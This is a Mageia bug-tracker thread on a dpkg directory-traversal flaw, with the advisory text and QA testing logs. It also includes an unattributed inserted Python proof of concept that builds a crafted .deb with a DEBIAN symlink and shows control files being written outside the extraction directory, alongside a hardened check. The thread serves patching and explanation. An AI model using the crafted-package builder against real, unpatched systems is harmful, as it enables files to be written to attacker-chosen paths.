| Summary: | dpkg new security issue rhbz#1598872 | | |
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | normal | | |
| Priority: | Normal | CC: | bruno, herman.viaene, sysadmin-bugs, tarazed25, tmb |
| Version: | 6 | Keywords: | advisory, validated_update |
| Target Milestone: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| Whiteboard: | MGA6-32-OK MGA6-64-OK | | |
| Source RPM: | dpkg-1.18.23-1.mga6.src.rpm | CVE: | |
| Status comment: | | | |
Description
David Walser
2018-08-08 20:22:04 CEST

David Walser
2018-08-08 20:22:15 CEST
Whiteboard: (none) => MGA6TOO

Updated packages uploaded by Bruno.

Advisory:
========================

Updated dpkg packages fix security vulnerability:

A flaw was found in dpkg which allows an attacker to perform a directory traversal by extracting with "dpkg-deb --raw-extract" a crafted .deb file with a /DEBIAN symlink (bdo#879982).

References:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=879982
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/64MG54Q347INMLYDW47XBYZQ3BQCXEXC/
========================

Updated packages in core/updates_testing:
========================
dpkg-1.18.25-1.mga6
perl-Dpkg-1.18.25-1.mga6

from dpkg-1.18.25-1.mga6.src.rpm

CC: (none) => bruno

Updates have been pushed into mga6 and cauldron (no update for 5, which is out of the maintenance window now).

Status: NEW => ASSIGNED

MGA6-32 MATE on IBM Thinkpad R50e in Dutch
No installation issues.
Took some inspiration from bug 13279.
Note that a lot of dpkg options return an error when no package has been installed yet. What produced decent feedback after downloading some .deb file:

# dpkg --version
Debian 'dpkg' package management program version 1.18.25 (i386).
This is free software; see the GNU General Public License version 2 or
later for copying conditions. There is NO warranty.
(output was in Dutch; translated here)

Is OK

# dpkg -c qr-code-creator_1.0_all.deb
drwxr-xr-x root/root 0 2011-03-26 18:32 ./
drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/
drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/
drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/man/
drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/man/man1/
-rw-r--r-- root/root 385 2011-03-26 18:32 ./usr/share/man/man1/qr-code-creator.1.gz
drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/pixmaps/
-rw-r--r-- root/root 238 2011-03-26 18:32 ./usr/share/pixmaps/qr-code-creator.png
drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/doc/
drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/doc/qr-code-creator/
-rw-r--r-- root/root 1235 2011-03-26 18:32 ./usr/share/doc/qr-code-creator/copyright
-rw-r--r-- root/root 157 2011-03-26 18:32 ./usr/share/doc/qr-code-creator/changelog.gz
drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/qr-code-creator/
drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/share/applications/
-rw-r--r-- root/root 217 2011-03-26 18:32 ./usr/share/applications/qr-code-creator.desktop
drwxr-xr-x root/root 0 2011-03-26 18:32 ./usr/bin/
-rwxr-xr-x root/root 3717 2011-03-26 18:32 ./usr/bin/qr-code-creator

Looks OK

# dpkg -x qr-code-creator_1.0_all.deb ./tmp
Checked that the above files have been created in the correct folders under ./tmp: all OK

# dpkg --print-architecture
i386

This all seems to work well.

CC: (none) => herman.viaene

x86_64
Could not find a reproducer test file.
Tried out the raw-extract command before updating.
$ mkdir partclone
$ dpkg-deb --raw-extract partclone_0.2.69-1_i386.deb ./partclone
$ ls partclone
DEBIAN/ usr/
Ran the update and tried that again.
$ mkdir phoronix
$ dpkg-deb --raw-extract phoronix-test-suite_5.2.1_all.deb ./phoronix
$ ls phoronix
DEBIAN/ etc/ usr/
Straightforward extraction:
$ mkdir coapp
$ dpkg -x net.downloadhelper.coapp-1.1.2-1_amd64.deb ./coapp
$ tree coapp
coapp
├── etc
│ ├── chromium
│ │ └── native-messaging-hosts
│ │ └── net.downloadhelper.coapp.json
│ └── opt
│ └── chrome
│ └── native-messaging-hosts
│ └── net.downloadhelper.coapp.json
├── opt
│ └── net.downloadhelper.coapp
│ ├── bin
│ │ └── net.downloadhelper.coapp-linux-64
│ ├── config.json
│ ├── converter
[...]
│ │ └── libz.so.1
│ ├── LICENSE.txt
│ └── README.txt
└── usr
└── lib
└── mozilla
└── native-messaging-hosts
└── net.downloadhelper.coapp.json
17 directories, 43 files
Echoed tests from comment 3.
$ dpkg --version
Debian 'dpkg' package management program version 1.18.25 (amd64).
This is free software; see the GNU General Public License version 2 or
later for copying conditions. There is NO warranty.
$ dpkg --print-architecture
amd64
$ dpkg -c partclone_0.2.69-1_i386.deb
drwxr-xr-x root/root 0 2013-12-26 07:18 ./
drwxr-xr-x root/root 0 2013-12-26 07:18 ./usr/
drwxr-xr-x root/root 0 2013-12-26 07:18 ./usr/sbin/
-rwxr-xr-x root/root 67336 2013-12-26 07:18 ./usr/sbin/partclone.fat
[...]
lrwxrwxrwx root/root 0 2013-12-26 07:18 ./usr/share/man/man8/partclone.vmfs.8.gz -> partclone.8.gz
lrwxrwxrwx root/root 0 2013-12-26 07:18 ./usr/share/man/man8/partclone.extfs.8.gz -> partclone.8.gz
No regressions so OK for 64-bit.

CC: (none) => tarazed25
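Since no reproducer file turned up during testing, here is a self-contained model of the bug the advisory describes. It is an added example, not code from dpkg or from anyone on this bug: it builds a crafted .deb whose data.tar carries a symlink named DEBIAN pointing at an attacker-chosen directory, then runs a small Python re-implementation of the --raw-extract sequence (filesystem half into the target directory, then the control half into target/DEBIAN). The "naive" mode shows the control file landing outside the extraction directory; the "hardened" mode refuses when DEBIAN is a symlink, which is the kind of lstat-based check a fix for this class of bug needs. The exact code of the dpkg 1.18.25 fix is not reproduced here; the directory names, the package metadata and the two-mode structure are all constructed for the example.

```python
"""Model of the dpkg-deb --raw-extract DEBIAN-symlink traversal (bdo#879982).

Added example, not dpkg's code.  The .deb container format (ar archive with
debian-binary, control.tar.gz and data.tar.gz members) and the extraction
order are real; everything else is constructed for illustration.
"""
import io
import os
import tarfile
import tempfile


def ar_member(name: bytes, data: bytes) -> bytes:
    """Encode one member of the classic 'ar' archive that wraps a .deb."""
    header = (name.ljust(16) + b"0".ljust(12) + b"0".ljust(6) + b"0".ljust(6)
              + b"100644".ljust(8) + str(len(data)).encode().ljust(10) + b"`\n")
    if len(data) % 2:
        data += b"\n"          # ar pads members to an even length
    return header + data


def tar_gz(members) -> bytes:
    """Build a .tar.gz from (name, kind, payload) tuples; kind is dir/file/symlink."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, kind, payload in members:
            info = tarfile.TarInfo(name)
            if kind == "dir":
                info.type, info.mode = tarfile.DIRTYPE, 0o755
                tf.addfile(info)
            elif kind == "symlink":
                info.type, info.mode, info.linkname = tarfile.SYMTYPE, 0o777, payload
                tf.addfile(info)
            else:
                info.size, info.mode = len(payload), 0o644
                tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def build_crafted_deb(path: str, symlink_target: str) -> None:
    """Write a .deb whose filesystem half makes ./DEBIAN a symlink to symlink_target."""
    control = b"Package: crafted\nVersion: 1.0\nArchitecture: all\n"  # constructed
    with open(path, "wb") as f:
        f.write(b"!<arch>\n")
        f.write(ar_member(b"debian-binary", b"2.0\n"))
        f.write(ar_member(b"control.tar.gz", tar_gz([("./control", "file", control)])))
        f.write(ar_member(b"data.tar.gz", tar_gz([("./", "dir", None),
                                                  ("./DEBIAN", "symlink", symlink_target)])))


def read_ar(path: str) -> dict:
    """Return {member name: bytes} for a classic ar archive."""
    members = {}
    with open(path, "rb") as f:
        if f.read(8) != b"!<arch>\n":
            raise ValueError("not an ar archive")
        while True:
            header = f.read(60)
            if len(header) < 60:
                break
            size = int(header[48:58].decode())
            members[header[:16].rstrip().decode()] = f.read(size)
            if size % 2:
                f.read(1)      # skip the padding byte
    return members


def untar_into(tar_data: bytes, dest: str) -> None:
    """Minimal extractor for dirs, regular files and symlinks (other types ignored)."""
    with tarfile.open(fileobj=io.BytesIO(tar_data), mode="r:gz") as tf:
        for m in tf:
            target = os.path.join(dest, os.path.normpath(m.name))
            if m.isdir():
                os.makedirs(target, exist_ok=True)
            elif m.issym():
                os.symlink(m.linkname, target)   # created as-is, just as tar does
            elif m.isfile():
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with open(target, "wb") as out:
                    out.write(tf.extractfile(m).read())


def raw_extract(deb: str, dest: str, hardened: bool) -> str:
    """Emulate dpkg-deb --raw-extract; return the real path of the written control file."""
    members = read_ar(deb)
    os.makedirs(dest, exist_ok=True)
    untar_into(members["data.tar.gz"], dest)            # filesystem half first
    debian_dir = os.path.join(dest, "DEBIAN")
    # Hardened mode models the needed check: look at DEBIAN with lstat semantics
    # and refuse if it is a symlink, so control files cannot be redirected.
    if hardened and os.path.islink(debian_dir):
        raise RuntimeError("refusing to extract control files: DEBIAN is a symlink")
    os.makedirs(debian_dir, exist_ok=True)              # follows the attacker's symlink
    untar_into(members["control.tar.gz"], debian_dir)
    return os.path.realpath(os.path.join(debian_dir, "control"))


def demo() -> dict:
    """Run both modes against one crafted .deb in a scratch directory."""
    work = tempfile.mkdtemp(prefix="raw-extract-")
    victim = os.path.join(work, "victim")   # attacker-chosen directory (constructed)
    os.makedirs(victim)
    deb = os.path.join(work, "crafted.deb")
    build_crafted_deb(deb, victim)

    naive_control = raw_extract(deb, os.path.join(work, "naive"), hardened=False)
    try:
        raw_extract(deb, os.path.join(work, "hardened"), hardened=True)
        refused = False
    except RuntimeError:
        refused = True
    return {
        "naive_wrote_outside_dest": os.path.dirname(naive_control) == os.path.realpath(victim),
        "leaked_control_exists": os.path.exists(os.path.join(victim, "control")),
        "hardened_refused": refused,
    }


if __name__ == "__main__":
    print(demo())
```

The point the model makes is that the data half is untrusted input that runs before the control half, so anything it can place at target/DEBIAN decides where the control files go; a plain stat() or isdir() check is not enough because both follow the symlink, which is why the check has to be link-aware. The same script, pointed at a real .deb, also shows what a fixed dpkg-deb would have to refuse.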
Len Lawrence
2018-08-22 20:01:35 CEST
Whiteboard: MGA6-32-OK => MGA6-32-OK MGA-64-OK

Len Lawrence
2018-08-22 20:02:46 CEST
Whiteboard: MGA6-32-OK MGA-64-OK => MGA6-32-OK MGA6-64-OK

Len Lawrence
2018-08-23 10:55:33 CEST
Keywords: (none) => validated_update

Thomas Backlund
2018-08-24 00:27:57 CEST
Keywords: (none) => advisory

An update for this issue has been pushed to the Mageia Updates repository.
https://advisories.mageia.org/MGASA-2018-0352.html

Resolution: (none) => FIXED